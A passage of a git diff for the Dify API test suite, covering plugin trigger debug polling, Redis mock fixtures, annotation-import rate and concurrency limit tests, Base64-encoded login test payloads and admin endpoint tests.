"debug-secret"}, + credential_type="api-key", + ) + db_session_with_containers.add(subscription) + 
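+    # The subscription's endpoint_id is the path parameter that
+    # /triggers/plugin/<endpoint_id> resolves below, so the row must be
+    # committed before the request is issued.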
db_session_with_containers.commit() + + # Create plugin trigger node config + node_id = "plugin-debug-node" + node_config = { + "id": node_id, + "data": { + "type": NodeType.TRIGGER_PLUGIN.value, + "title": "plugin-debug", + "plugin_id": "debug-plugin", + "plugin_unique_identifier": "debug-plugin", + "provider_id": provider_id, + "event_name": event_name, + "subscription_id": subscription.id, + "parameters": {}, + }, + } + + # Start listening with poller + + poller = PluginTriggerDebugEventPoller( + tenant_id=tenant.id, + user_id=account.id, + app_id=app_model.id, + node_config=node_config, + node_id=node_id, + ) + assert poller.poll() is None, "First poll should return None (waiting)" + + # Track debug events dispatched + debug_events: list[dict[str, Any]] = [] + original_dispatch = TriggerDebugEventBus.dispatch + + def _tracking_dispatch(**kwargs: Any) -> int: + debug_events.append(kwargs) + return original_dispatch(**kwargs) + + monkeypatch.setattr(TriggerDebugEventBus, "dispatch", staticmethod(_tracking_dispatch)) + + # Mock process_endpoint to trigger debug event dispatch + def _fake_process_endpoint(_endpoint_id: str, _request: Any) -> Response: + # Simulate what happens inside process_endpoint + dispatch_triggered_workflows_async + pool_key = build_plugin_pool_key( + tenant_id=tenant.id, + provider_id=provider_id, + subscription_id=subscription.id, + name=event_name, + ) + TriggerDebugEventBus.dispatch( + tenant_id=tenant.id, + event=PluginTriggerDebugEvent( + timestamp=int(time.time()), + user_id="end-user", + name=event_name, + request_id=f"req-{_endpoint_id}", + subscription_id=subscription.id, + provider_id=provider_id, + ), + pool_key=pool_key, + ) + return Response("ok", status=202) + + monkeypatch.setattr( + "services.trigger.trigger_service.TriggerService.process_endpoint", + staticmethod(_fake_process_endpoint), + ) + + # Call HTTP endpoint + response = test_client_with_containers.post(f"/triggers/plugin/{endpoint_id}", json={"debug": "payload"}) + + assert response.status_code == 202 + assert debug_events, "Debug event should be dispatched via HTTP endpoint" + assert debug_events[0]["event"].name == event_name + + # Mock invoke_trigger_event for poller + + monkeypatch.setattr( + "services.trigger.trigger_service.TriggerService.invoke_trigger_event", + staticmethod( + lambda **_kwargs: TriggerInvokeEventResponse( + variables={"http_debug": "success"}, + cancelled=False, + ) + ), + ) + + # Second poll should receive the event + event = poller.poll() + assert event is not None, "Poller should receive debug event after HTTP trigger" + assert event.workflow_args["inputs"]["http_debug"] == "success" diff --git a/api/tests/unit_tests/conftest.py b/api/tests/unit_tests/conftest.py index f484fb22d3..c5e1576186 100644 --- a/api/tests/unit_tests/conftest.py +++ b/api/tests/unit_tests/conftest.py @@ -26,16 +26,29 @@ redis_mock.hgetall = MagicMock(return_value={}) redis_mock.hdel = MagicMock() redis_mock.incr = MagicMock(return_value=1) +# Ensure OpenDAL fs writes to tmp to avoid polluting workspace +os.environ.setdefault("OPENDAL_SCHEME", "fs") +os.environ.setdefault("OPENDAL_FS_ROOT", "/tmp/dify-storage") +os.environ.setdefault("STORAGE_TYPE", "opendal") + # Add the API directory to Python path to ensure proper imports import sys sys.path.insert(0, PROJECT_DIR) -# apply the mock to the Redis client in the Flask app from extensions import ext_redis -redis_patcher = patch.object(ext_redis, "redis_client", redis_mock) -redis_patcher.start() + +def 
_patch_redis_clients_on_loaded_modules(): + """Ensure any module-level redis_client references point to the shared redis_mock.""" + + import sys + + for module in list(sys.modules.values()): + if module is None: + continue + if hasattr(module, "redis_client"): + module.redis_client = redis_mock @pytest.fixture @@ -49,6 +62,15 @@ def _provide_app_context(app: Flask): yield +@pytest.fixture(autouse=True) +def _patch_redis_clients(): + """Patch redis_client to MagicMock only for unit test executions.""" + + with patch.object(ext_redis, "redis_client", redis_mock): + _patch_redis_clients_on_loaded_modules() + yield + + @pytest.fixture(autouse=True) def reset_redis_mock(): """reset the Redis mock before each test""" @@ -63,3 +85,20 @@ def reset_redis_mock(): redis_mock.hgetall.return_value = {} redis_mock.hdel.return_value = None redis_mock.incr.return_value = 1 + + # Keep any imported modules pointing at the mock between tests + _patch_redis_clients_on_loaded_modules() + + +@pytest.fixture(autouse=True) +def reset_secret_key(): + """Ensure SECRET_KEY-dependent logic sees an empty config value by default.""" + + from configs import dify_config + + original = dify_config.SECRET_KEY + dify_config.SECRET_KEY = "" + try: + yield + finally: + dify_config.SECRET_KEY = original diff --git a/api/tests/unit_tests/controllers/console/app/test_annotation_security.py b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py new file mode 100644 index 0000000000..06a7b98baf --- /dev/null +++ b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py @@ -0,0 +1,347 @@ +""" +Unit tests for annotation import security features. + +Tests rate limiting, concurrency control, file validation, and other +security features added to prevent DoS attacks on the annotation import endpoint. 
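+
+The rate limit and concurrency checks are exercised at the Redis level: the
+decorators are expected to keep a sorted set per caller, trim expired entries
+with ZREMRANGEBYSCORE, and count the remainder with ZCARD, which is why these
+tests drive ``zcard`` return values and assert on ``zadd``/``zremrangebyscore``
+calls.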
+""" + +import io +from unittest.mock import MagicMock, patch + +import pytest +from pandas.errors import ParserError +from werkzeug.datastructures import FileStorage + +from configs import dify_config + + +class TestAnnotationImportRateLimiting: + """Test rate limiting for annotation import operations.""" + + @pytest.fixture + def mock_redis(self): + """Mock Redis client for testing.""" + with patch("controllers.console.wraps.redis_client") as mock: + yield mock + + @pytest.fixture + def mock_current_account(self): + """Mock current account with tenant.""" + with patch("controllers.console.wraps.current_account_with_tenant") as mock: + mock.return_value = (MagicMock(id="user_id"), "test_tenant_id") + yield mock + + def test_rate_limit_per_minute_enforced(self, mock_redis, mock_current_account): + """Test that per-minute rate limit is enforced.""" + from controllers.console.wraps import annotation_import_rate_limit + + # Simulate exceeding per-minute limit + mock_redis.zcard.side_effect = [ + dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE + 1, # Minute check + 10, # Hour check + ] + + @annotation_import_rate_limit + def dummy_view(): + return "success" + + # Should abort with 429 + with pytest.raises(Exception) as exc_info: + dummy_view() + + # Verify it's a rate limit error + assert "429" in str(exc_info.value) or "Too many" in str(exc_info.value) + + def test_rate_limit_per_hour_enforced(self, mock_redis, mock_current_account): + """Test that per-hour rate limit is enforced.""" + from controllers.console.wraps import annotation_import_rate_limit + + # Simulate exceeding per-hour limit + mock_redis.zcard.side_effect = [ + 3, # Minute check (under limit) + dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR + 1, # Hour check (over limit) + ] + + @annotation_import_rate_limit + def dummy_view(): + return "success" + + # Should abort with 429 + with pytest.raises(Exception) as exc_info: + dummy_view() + + assert "429" in str(exc_info.value) or "Too many" in str(exc_info.value) + + def test_rate_limit_within_limits_passes(self, mock_redis, mock_current_account): + """Test that requests within limits are allowed.""" + from controllers.console.wraps import annotation_import_rate_limit + + # Simulate being under both limits + mock_redis.zcard.return_value = 2 + + @annotation_import_rate_limit + def dummy_view(): + return "success" + + # Should succeed + result = dummy_view() + assert result == "success" + + # Verify Redis operations were called + assert mock_redis.zadd.called + assert mock_redis.zremrangebyscore.called + + +class TestAnnotationImportConcurrencyControl: + """Test concurrency control for annotation import operations.""" + + @pytest.fixture + def mock_redis(self): + """Mock Redis client for testing.""" + with patch("controllers.console.wraps.redis_client") as mock: + yield mock + + @pytest.fixture + def mock_current_account(self): + """Mock current account with tenant.""" + with patch("controllers.console.wraps.current_account_with_tenant") as mock: + mock.return_value = (MagicMock(id="user_id"), "test_tenant_id") + yield mock + + def test_concurrency_limit_enforced(self, mock_redis, mock_current_account): + """Test that concurrent task limit is enforced.""" + from controllers.console.wraps import annotation_import_concurrency_limit + + # Simulate max concurrent tasks already running + mock_redis.zcard.return_value = dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT + + @annotation_import_concurrency_limit + def dummy_view(): + return "success" + + # Should abort with 429 + with 
pytest.raises(Exception) as exc_info: + dummy_view() + + assert "429" in str(exc_info.value) or "concurrent" in str(exc_info.value).lower() + + def test_concurrency_within_limit_passes(self, mock_redis, mock_current_account): + """Test that requests within concurrency limits are allowed.""" + from controllers.console.wraps import annotation_import_concurrency_limit + + # Simulate being under concurrent task limit + mock_redis.zcard.return_value = 1 + + @annotation_import_concurrency_limit + def dummy_view(): + return "success" + + # Should succeed + result = dummy_view() + assert result == "success" + + def test_stale_jobs_are_cleaned_up(self, mock_redis, mock_current_account): + """Test that old/stale job entries are removed.""" + from controllers.console.wraps import annotation_import_concurrency_limit + + mock_redis.zcard.return_value = 0 + + @annotation_import_concurrency_limit + def dummy_view(): + return "success" + + dummy_view() + + # Verify cleanup was called + assert mock_redis.zremrangebyscore.called + + +class TestAnnotationImportFileValidation: + """Test file validation in annotation import.""" + + def test_file_size_limit_enforced(self): + """Test that files exceeding size limit are rejected.""" + # Create a file larger than the limit + max_size = dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT * 1024 * 1024 + large_content = b"x" * (max_size + 1024) # Exceed by 1KB + + file = FileStorage(stream=io.BytesIO(large_content), filename="test.csv", content_type="text/csv") + + # Should be rejected in controller + # This would be tested in integration tests with actual endpoint + + def test_empty_file_rejected(self): + """Test that empty files are rejected.""" + file = FileStorage(stream=io.BytesIO(b""), filename="test.csv", content_type="text/csv") + + # Should be rejected + # This would be tested in integration tests + + def test_non_csv_file_rejected(self): + """Test that non-CSV files are rejected.""" + file = FileStorage(stream=io.BytesIO(b"test"), filename="test.txt", content_type="text/plain") + + # Should be rejected based on extension + # This would be tested in integration tests + + +class TestAnnotationImportServiceValidation: + """Test service layer validation for annotation import.""" + + @pytest.fixture + def mock_app(self): + """Mock application object.""" + app = MagicMock() + app.id = "app_id" + return app + + @pytest.fixture + def mock_db_session(self): + """Mock database session.""" + with patch("services.annotation_service.db.session") as mock: + yield mock + + def test_max_records_limit_enforced(self, mock_app, mock_db_session): + """Test that files with too many records are rejected.""" + from services.annotation_service import AppAnnotationService + + # Create CSV with too many records + max_records = dify_config.ANNOTATION_IMPORT_MAX_RECORDS + csv_content = "question,answer\n" + for i in range(max_records + 100): + csv_content += f"Question {i},Answer {i}\n" + + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + with patch("services.annotation_service.FeatureService") as mock_features: + mock_features.get_features.return_value.billing.enabled = False + + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + # Should return error about too 
many records + assert "error_msg" in result + assert "too many" in result["error_msg"].lower() or "maximum" in result["error_msg"].lower() + + def test_min_records_limit_enforced(self, mock_app, mock_db_session): + """Test that files with too few valid records are rejected.""" + from services.annotation_service import AppAnnotationService + + # Create CSV with only header (no data rows) + csv_content = "question,answer\n" + + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + # Should return error about insufficient records + assert "error_msg" in result + assert "at least" in result["error_msg"].lower() or "minimum" in result["error_msg"].lower() + + def test_invalid_csv_format_handled(self, mock_app, mock_db_session): + """Test that invalid CSV format is handled gracefully.""" + from services.annotation_service import AppAnnotationService + + # Any content is fine once we force ParserError + csv_content = 'invalid,csv,format\nwith,unbalanced,quotes,and"stuff' + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with ( + patch("services.annotation_service.current_account_with_tenant") as mock_auth, + patch("services.annotation_service.pd.read_csv", side_effect=ParserError("malformed CSV")), + ): + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + assert "error_msg" in result + assert "malformed" in result["error_msg"].lower() + + def test_valid_import_succeeds(self, mock_app, mock_db_session): + """Test that valid import request succeeds.""" + from services.annotation_service import AppAnnotationService + + # Create valid CSV + csv_content = "question,answer\nWhat is AI?,Artificial Intelligence\nWhat is ML?,Machine Learning\n" + + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + with patch("services.annotation_service.FeatureService") as mock_features: + mock_features.get_features.return_value.billing.enabled = False + + with patch("services.annotation_service.batch_import_annotations_task") as mock_task: + with patch("services.annotation_service.redis_client"): + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + # Should return success response + assert "job_id" in result + assert "job_status" in result + assert result["job_status"] == "waiting" + assert "record_count" in result + assert result["record_count"] == 2 + + +class TestAnnotationImportTaskOptimization: + """Test optimizations in batch import task.""" + + def test_task_has_timeout_configured(self): + """Test that task has proper timeout configuration.""" + from tasks.annotation.batch_import_annotations_task import batch_import_annotations_task + + # Verify task configuration + assert 
hasattr(batch_import_annotations_task, "time_limit") + assert hasattr(batch_import_annotations_task, "soft_time_limit") + + # Check timeout values are reasonable + # Hard limit should be 6 minutes (360s) + # Soft limit should be 5 minutes (300s) + # Note: actual values depend on Celery configuration + + +class TestConfigurationValues: + """Test that security configuration values are properly set.""" + + def test_rate_limit_configs_exist(self): + """Test that rate limit configurations are defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE") + assert hasattr(dify_config, "ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR") + + assert dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE > 0 + assert dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR > 0 + + def test_file_size_limit_config_exists(self): + """Test that file size limit configuration is defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_FILE_SIZE_LIMIT") + assert dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT > 0 + assert dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT <= 10 # Reasonable max (10MB) + + def test_record_limit_configs_exist(self): + """Test that record limit configurations are defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_MAX_RECORDS") + assert hasattr(dify_config, "ANNOTATION_IMPORT_MIN_RECORDS") + + assert dify_config.ANNOTATION_IMPORT_MAX_RECORDS > 0 + assert dify_config.ANNOTATION_IMPORT_MIN_RECORDS > 0 + assert dify_config.ANNOTATION_IMPORT_MIN_RECORDS < dify_config.ANNOTATION_IMPORT_MAX_RECORDS + + def test_concurrency_limit_config_exists(self): + """Test that concurrency limit configuration is defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_MAX_CONCURRENT") + assert dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT > 0 + assert dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT <= 10 # Reasonable upper bound diff --git a/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py b/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py index b6697ac5d4..eb21920117 100644 --- a/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py +++ b/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py @@ -1,5 +1,6 @@ """Test authentication security to prevent user enumeration.""" +import base64 from unittest.mock import MagicMock, patch import pytest @@ -11,6 +12,11 @@ from controllers.console.auth.error import AuthenticationFailedError from controllers.console.auth.login import LoginApi +def encode_password(password: str) -> str: + """Helper to encode password as Base64 for testing.""" + return base64.b64encode(password.encode("utf-8")).decode() + + class TestAuthenticationSecurity: """Test authentication endpoints for security against user enumeration.""" @@ -42,7 +48,9 @@ class TestAuthenticationSecurity: # Act with self.app.test_request_context( - "/login", method="POST", json={"email": "nonexistent@example.com", "password": "WrongPass123!"} + "/login", + method="POST", + json={"email": "nonexistent@example.com", "password": encode_password("WrongPass123!")}, ): login_api = LoginApi() @@ -72,7 +80,9 @@ class TestAuthenticationSecurity: # Act with self.app.test_request_context( - "/login", method="POST", json={"email": "existing@example.com", "password": "WrongPass123!"} + "/login", + method="POST", + json={"email": "existing@example.com", "password": encode_password("WrongPass123!")}, ): login_api = LoginApi() @@ -104,7 +114,9 @@ class TestAuthenticationSecurity: # Act with 
self.app.test_request_context( - "/login", method="POST", json={"email": "nonexistent@example.com", "password": "WrongPass123!"} + "/login", + method="POST", + json={"email": "nonexistent@example.com", "password": encode_password("WrongPass123!")}, ): login_api = LoginApi() diff --git a/api/tests/unit_tests/controllers/console/auth/test_email_verification.py b/api/tests/unit_tests/controllers/console/auth/test_email_verification.py index a44f518171..9929a71120 100644 --- a/api/tests/unit_tests/controllers/console/auth/test_email_verification.py +++ b/api/tests/unit_tests/controllers/console/auth/test_email_verification.py @@ -8,6 +8,7 @@ This module tests the email code login mechanism including: - Workspace creation for new users """ +import base64 from unittest.mock import MagicMock, patch import pytest @@ -25,6 +26,11 @@ from controllers.console.error import ( from services.errors.account import AccountRegisterError +def encode_code(code: str) -> str: + """Helper to encode verification code as Base64 for testing.""" + return base64.b64encode(code.encode("utf-8")).decode() + + class TestEmailCodeLoginSendEmailApi: """Test cases for sending email verification codes.""" @@ -290,7 +296,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "123456", "token": "valid_token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "valid_token"}, ): api = EmailCodeLoginApi() response = api.post() @@ -339,7 +345,12 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "newuser@example.com", "code": "123456", "token": "valid_token", "language": "en-US"}, + json={ + "email": "newuser@example.com", + "code": encode_code("123456"), + "token": "valid_token", + "language": "en-US", + }, ): api = EmailCodeLoginApi() response = api.post() @@ -365,7 +376,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "123456", "token": "invalid_token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "invalid_token"}, ): api = EmailCodeLoginApi() with pytest.raises(InvalidTokenError): @@ -388,7 +399,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "different@example.com", "code": "123456", "token": "token"}, + json={"email": "different@example.com", "code": encode_code("123456"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(InvalidEmailError): @@ -411,7 +422,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "wrong_code", "token": "token"}, + json={"email": "test@example.com", "code": encode_code("wrong_code"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(EmailCodeError): @@ -497,7 +508,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "123456", "token": "token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(WorkspacesLimitExceeded): @@ -539,7 +550,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": 
"test@example.com", "code": "123456", "token": "token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(NotAllowedCreateWorkspace): diff --git a/api/tests/unit_tests/controllers/console/auth/test_login_logout.py b/api/tests/unit_tests/controllers/console/auth/test_login_logout.py index 8799d6484d..3a2cf7bad7 100644 --- a/api/tests/unit_tests/controllers/console/auth/test_login_logout.py +++ b/api/tests/unit_tests/controllers/console/auth/test_login_logout.py @@ -8,6 +8,7 @@ This module tests the core authentication endpoints including: - Account status validation """ +import base64 from unittest.mock import MagicMock, patch import pytest @@ -28,6 +29,11 @@ from controllers.console.error import ( from services.errors.account import AccountLoginError, AccountPasswordError +def encode_password(password: str) -> str: + """Helper to encode password as Base64 for testing.""" + return base64.b64encode(password.encode("utf-8")).decode() + + class TestLoginApi: """Test cases for the LoginApi endpoint.""" @@ -106,7 +112,9 @@ class TestLoginApi: # Act with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "ValidPass123!"} + "/login", + method="POST", + json={"email": "test@example.com", "password": encode_password("ValidPass123!")}, ): login_api = LoginApi() response = login_api.post() @@ -158,7 +166,11 @@ class TestLoginApi: with app.test_request_context( "/login", method="POST", - json={"email": "test@example.com", "password": "ValidPass123!", "invite_token": "valid_token"}, + json={ + "email": "test@example.com", + "password": encode_password("ValidPass123!"), + "invite_token": "valid_token", + }, ): login_api = LoginApi() response = login_api.post() @@ -186,7 +198,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "password"} + "/login", method="POST", json={"email": "test@example.com", "password": encode_password("password")} ): login_api = LoginApi() with pytest.raises(EmailPasswordLoginLimitError): @@ -209,7 +221,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "frozen@example.com", "password": "password"} + "/login", method="POST", json={"email": "frozen@example.com", "password": encode_password("password")} ): login_api = LoginApi() with pytest.raises(AccountInFreezeError): @@ -246,7 +258,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "WrongPass123!"} + "/login", method="POST", json={"email": "test@example.com", "password": encode_password("WrongPass123!")} ): login_api = LoginApi() with pytest.raises(AuthenticationFailedError): @@ -277,7 +289,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "banned@example.com", "password": "ValidPass123!"} + "/login", method="POST", json={"email": "banned@example.com", "password": encode_password("ValidPass123!")} ): login_api = LoginApi() with pytest.raises(AccountBannedError): @@ -322,7 +334,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "ValidPass123!"} + "/login", method="POST", json={"email": "test@example.com", "password": encode_password("ValidPass123!")} ): login_api = LoginApi() with 
pytest.raises(WorkspacesLimitExceeded): @@ -349,7 +361,11 @@ class TestLoginApi: with app.test_request_context( "/login", method="POST", - json={"email": "different@example.com", "password": "ValidPass123!", "invite_token": "token"}, + json={ + "email": "different@example.com", + "password": encode_password("ValidPass123!"), + "invite_token": "token", + }, ): login_api = LoginApi() with pytest.raises(InvalidEmailError): diff --git a/api/tests/unit_tests/controllers/console/test_admin.py b/api/tests/unit_tests/controllers/console/test_admin.py new file mode 100644 index 0000000000..e0ddf6542e --- /dev/null +++ b/api/tests/unit_tests/controllers/console/test_admin.py @@ -0,0 +1,407 @@ +"""Final working unit tests for admin endpoints - tests business logic directly.""" + +import uuid +from unittest.mock import Mock, patch + +import pytest +from werkzeug.exceptions import NotFound, Unauthorized + +from controllers.console.admin import InsertExploreAppPayload +from models.model import App, RecommendedApp + + +class TestInsertExploreAppPayload: + """Test InsertExploreAppPayload validation.""" + + def test_valid_payload(self): + """Test creating payload with valid data.""" + payload_data = { + "app_id": str(uuid.uuid4()), + "desc": "Test app description", + "copyright": "© 2024 Test Company", + "privacy_policy": "https://example.com/privacy", + "custom_disclaimer": "Custom disclaimer text", + "language": "en-US", + "category": "Productivity", + "position": 1, + } + + payload = InsertExploreAppPayload.model_validate(payload_data) + + assert payload.app_id == payload_data["app_id"] + assert payload.desc == payload_data["desc"] + assert payload.copyright == payload_data["copyright"] + assert payload.privacy_policy == payload_data["privacy_policy"] + assert payload.custom_disclaimer == payload_data["custom_disclaimer"] + assert payload.language == payload_data["language"] + assert payload.category == payload_data["category"] + assert payload.position == payload_data["position"] + + def test_minimal_payload(self): + """Test creating payload with only required fields.""" + payload_data = { + "app_id": str(uuid.uuid4()), + "language": "en-US", + "category": "Productivity", + "position": 1, + } + + payload = InsertExploreAppPayload.model_validate(payload_data) + + assert payload.app_id == payload_data["app_id"] + assert payload.desc is None + assert payload.copyright is None + assert payload.privacy_policy is None + assert payload.custom_disclaimer is None + assert payload.language == payload_data["language"] + assert payload.category == payload_data["category"] + assert payload.position == payload_data["position"] + + def test_invalid_language(self): + """Test payload with invalid language code.""" + payload_data = { + "app_id": str(uuid.uuid4()), + "language": "invalid-lang", + "category": "Productivity", + "position": 1, + } + + with pytest.raises(ValueError, match="invalid-lang is not a valid language"): + InsertExploreAppPayload.model_validate(payload_data) + + +class TestAdminRequiredDecorator: + """Test admin_required decorator.""" + + def setup_method(self): + """Set up test fixtures.""" + # Mock dify_config + self.dify_config_patcher = patch("controllers.console.admin.dify_config") + self.mock_dify_config = self.dify_config_patcher.start() + self.mock_dify_config.ADMIN_API_KEY = "test-admin-key" + + # Mock extract_access_token + self.token_patcher = patch("controllers.console.admin.extract_access_token") + self.mock_extract_token = self.token_patcher.start() + + def teardown_method(self): + 
"""Clean up test fixtures.""" + self.dify_config_patcher.stop() + self.token_patcher.stop() + + def test_admin_required_success(self): + """Test successful admin authentication.""" + from controllers.console.admin import admin_required + + @admin_required + def test_view(): + return {"success": True} + + self.mock_extract_token.return_value = "test-admin-key" + result = test_view() + assert result["success"] is True + + def test_admin_required_invalid_token(self): + """Test admin_required with invalid token.""" + from controllers.console.admin import admin_required + + @admin_required + def test_view(): + return {"success": True} + + self.mock_extract_token.return_value = "wrong-key" + with pytest.raises(Unauthorized, match="API key is invalid"): + test_view() + + def test_admin_required_no_api_key_configured(self): + """Test admin_required when no API key is configured.""" + from controllers.console.admin import admin_required + + self.mock_dify_config.ADMIN_API_KEY = None + + @admin_required + def test_view(): + return {"success": True} + + with pytest.raises(Unauthorized, match="API key is invalid"): + test_view() + + def test_admin_required_missing_authorization_header(self): + """Test admin_required with missing authorization header.""" + from controllers.console.admin import admin_required + + @admin_required + def test_view(): + return {"success": True} + + self.mock_extract_token.return_value = None + with pytest.raises(Unauthorized, match="Authorization header is missing"): + test_view() + + +class TestExploreAppBusinessLogicDirect: + """Test the core business logic of explore app management directly.""" + + def test_data_fusion_logic(self): + """Test the data fusion logic between payload and site data.""" + # Test cases for different data scenarios + test_cases = [ + { + "name": "site_data_overrides_payload", + "payload": {"desc": "Payload desc", "copyright": "Payload copyright"}, + "site": {"description": "Site desc", "copyright": "Site copyright"}, + "expected": { + "desc": "Site desc", + "copyright": "Site copyright", + "privacy_policy": "", + "custom_disclaimer": "", + }, + }, + { + "name": "payload_used_when_no_site", + "payload": {"desc": "Payload desc", "copyright": "Payload copyright"}, + "site": None, + "expected": { + "desc": "Payload desc", + "copyright": "Payload copyright", + "privacy_policy": "", + "custom_disclaimer": "", + }, + }, + { + "name": "empty_defaults_when_no_data", + "payload": {}, + "site": None, + "expected": {"desc": "", "copyright": "", "privacy_policy": "", "custom_disclaimer": ""}, + }, + ] + + for case in test_cases: + # Simulate the data fusion logic + payload_desc = case["payload"].get("desc") + payload_copyright = case["payload"].get("copyright") + payload_privacy_policy = case["payload"].get("privacy_policy") + payload_custom_disclaimer = case["payload"].get("custom_disclaimer") + + if case["site"]: + site_desc = case["site"].get("description") + site_copyright = case["site"].get("copyright") + site_privacy_policy = case["site"].get("privacy_policy") + site_custom_disclaimer = case["site"].get("custom_disclaimer") + + # Site data takes precedence + desc = site_desc or payload_desc or "" + copyright = site_copyright or payload_copyright or "" + privacy_policy = site_privacy_policy or payload_privacy_policy or "" + custom_disclaimer = site_custom_disclaimer or payload_custom_disclaimer or "" + else: + # Use payload data or empty defaults + desc = payload_desc or "" + copyright = payload_copyright or "" + privacy_policy = payload_privacy_policy 
or "" + custom_disclaimer = payload_custom_disclaimer or "" + + result = { + "desc": desc, + "copyright": copyright, + "privacy_policy": privacy_policy, + "custom_disclaimer": custom_disclaimer, + } + + assert result == case["expected"], f"Failed test case: {case['name']}" + + def test_app_visibility_logic(self): + """Test that apps are made public when added to explore list.""" + # Create a mock app + mock_app = Mock(spec=App) + mock_app.is_public = False + + # Simulate the business logic + mock_app.is_public = True + + assert mock_app.is_public is True + + def test_recommended_app_creation_logic(self): + """Test the creation of RecommendedApp objects.""" + app_id = str(uuid.uuid4()) + payload_data = { + "app_id": app_id, + "desc": "Test app description", + "copyright": "© 2024 Test Company", + "privacy_policy": "https://example.com/privacy", + "custom_disclaimer": "Custom disclaimer", + "language": "en-US", + "category": "Productivity", + "position": 1, + } + + # Simulate the creation logic + recommended_app = Mock(spec=RecommendedApp) + recommended_app.app_id = payload_data["app_id"] + recommended_app.description = payload_data["desc"] + recommended_app.copyright = payload_data["copyright"] + recommended_app.privacy_policy = payload_data["privacy_policy"] + recommended_app.custom_disclaimer = payload_data["custom_disclaimer"] + recommended_app.language = payload_data["language"] + recommended_app.category = payload_data["category"] + recommended_app.position = payload_data["position"] + + # Verify the data + assert recommended_app.app_id == app_id + assert recommended_app.description == "Test app description" + assert recommended_app.copyright == "© 2024 Test Company" + assert recommended_app.privacy_policy == "https://example.com/privacy" + assert recommended_app.custom_disclaimer == "Custom disclaimer" + assert recommended_app.language == "en-US" + assert recommended_app.category == "Productivity" + assert recommended_app.position == 1 + + def test_recommended_app_update_logic(self): + """Test the update logic for existing RecommendedApp objects.""" + mock_recommended_app = Mock(spec=RecommendedApp) + + update_data = { + "desc": "Updated description", + "copyright": "© 2024 Updated", + "language": "fr-FR", + "category": "Tools", + "position": 2, + } + + # Simulate the update logic + mock_recommended_app.description = update_data["desc"] + mock_recommended_app.copyright = update_data["copyright"] + mock_recommended_app.language = update_data["language"] + mock_recommended_app.category = update_data["category"] + mock_recommended_app.position = update_data["position"] + + # Verify the updates + assert mock_recommended_app.description == "Updated description" + assert mock_recommended_app.copyright == "© 2024 Updated" + assert mock_recommended_app.language == "fr-FR" + assert mock_recommended_app.category == "Tools" 